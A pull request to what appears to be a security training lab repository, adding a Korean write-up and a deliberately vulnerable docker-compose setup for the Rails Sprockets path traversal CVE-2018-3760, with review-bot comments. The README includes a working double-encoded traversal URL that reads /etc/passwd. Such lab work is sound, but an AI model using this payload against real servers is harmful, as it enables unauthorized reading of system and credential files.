[이승재/le-e-e]: rails CVE-2018-3760 analysis code and results #27

Open · wants to merge 15 commits into base: main
21 changes: 0 additions & 21 deletions LICENSE

This file was deleted.

7 changes: 0 additions & 7 deletions README.md

This file was deleted.

34 changes: 0 additions & 34 deletions nginx/CVE-2017-7529/README.md

This file was deleted.

28 changes: 0 additions & 28 deletions nginx/CVE-2017-7529/default.conf

This file was deleted.

8 changes: 0 additions & 8 deletions nginx/CVE-2017-7529/docker-compose.yml

This file was deleted.

28 changes: 0 additions & 28 deletions nginx/CVE-2017-7529/poc.py

This file was deleted.

Binary file removed nginx/CVE-2017-7529/result.png
Binary file not shown.
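Review bot: the branch deletes files that have nothing to do with the stated purpose of this PR: LICENSE, the repository README.md, and the entire nginx/CVE-2017-7529 directory (README.md, default.conf, docker-compose.yml, poc.py, result.png). Merging as-is would drop the project license and an earlier vulnerability write-up. This usually happens when a branch is started from a stale fork or the files are removed locally by accident; rebase onto main and restore them so the diff contains only the rails/CVE-2018-3760 additions.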
Binary file added rails/CVE-2018-3760/1.png
Binary file added rails/CVE-2018-3760/2.png
30 changes: 30 additions & 0 deletions rails/CVE-2018-3760/README.md
@@ -0,0 +1,30 @@
# Ruby on rails 디렉토러 접근 취약점 (CVE-2018-)

##Contributors
이승재(@leeeeee)

## 요약
Ruby On Rails는 개발 환경에서 정적 파일 서버로 Sprockets를 사용하는 루비 웹 개발 프레임워크로 널리 알려져 있으며,
정적 리소스 파일을 컴파일하여 배포하는 루비 라이브러리인 Sprockets는 정적 리소스 파일을 컴파일하고 배포하는 루비 라이브러리다.

Sprockets 3.7.1 이하 버전에는 2차 디코딩으로 인한 디렉토리 접근 취약성이 있다. 공격자는 %252e%252e/를 사용하여 루트 디렉터리에 액세스하고 대상 서버의 모든 파일을 읽거나 실행할 수 있다.

참고 링크 :
- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
- https://seclists.org/oss-sec/2018/q2/210
- https://xz.aliyun.com/t/2542

## 환성 설정
다음과 같은 명령어를 입력 :

```docker compose up -d```


## 실행
/etc/passwd 파일이 허용된 디렉토리에 없기 때문에 http://your-ip:3000/assets/file:%2f%2f/etc/passwd를 직접 방문하여 오류를 발생시킨다.
![1](https://github.com/le-e-e/whitehat-school-vulhub/assets/51049963/7ecc364c-20a7-445c-820b-27cf7e788e78)
오류 페이지별로 허용된 디렉토리 목록을 가져올 수 있다. /usr/src/blog/app/assets/images와 같은 디렉토리 중 하나를 선택한 후 %252e%252e/를 사용하여 상위 디렉토리로 이동한 후 /etc/passwd 파일을 열람한다.

```http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd```
![2](https://github.com/le-e-e/whitehat-school-vulhub/assets/51049963/055cee2b-794e-4d71-a6c8-17b7555eaeff)

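Review bot: the impact sentence in the summary ("공격자는 %252e%252e/를 사용하여 루트 디렉터리에 액세스하고 대상 서버의 모든 파일을 읽거나 실행할 수 있다") overstates the bug; the PoC below it and the linked advisory describe an arbitrary file read by path traversal, limited to files the Rails process can read, and nothing here executes anything. Reword it to "read any file the server process can read". The mechanism deserves one explicit sentence too: as the phrase "2차 디코딩" implies, the path is decoded once, checked against the allowed asset directories, and then decoded again, so `%252e%252e/` survives the check as `%2e%2e/` and only becomes `../` afterwards; spelling that out explains why the error page's directory list is needed as the prefix. Documentation fixes: the title reads "(CVE-2018-)" and is missing the number 3760; "##Contributors" needs a space after "##" to render as a heading; "디렉토러" should be "디렉터리" and "환성 설정" should be "환경 설정"; the two clauses of the first summary sentence say the same thing twice about Sprockets compiling and serving static assets, so keep one. Finally, state the precondition under which the traversal is reachable (Sprockets serving assets, as in the development setup the first sentence mentions and as the linked oss-sec advisory spells out) and which Sprockets releases fix it, so readers of the write-up know both why the vulhub image is exploitable and what to upgrade to.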
6 changes: 6 additions & 0 deletions rails/CVE-2018-3760/docker-compose.yml
@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/rails:5.0.7
ports:
- "3000:3000"
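Review bot: `version: '2'` on the first line is obsolete for the `docker compose` (V2) CLI that the README tells readers to run; Compose V2 ignores the attribute and prints a warning, so drop the line. Also consider binding the published port to the loopback interface ("127.0.0.1:3000:3000") rather than "3000:3000": this container is deliberately vulnerable, and as published it offers an arbitrary file read of the container file system to anyone who can reach port 3000 on the host.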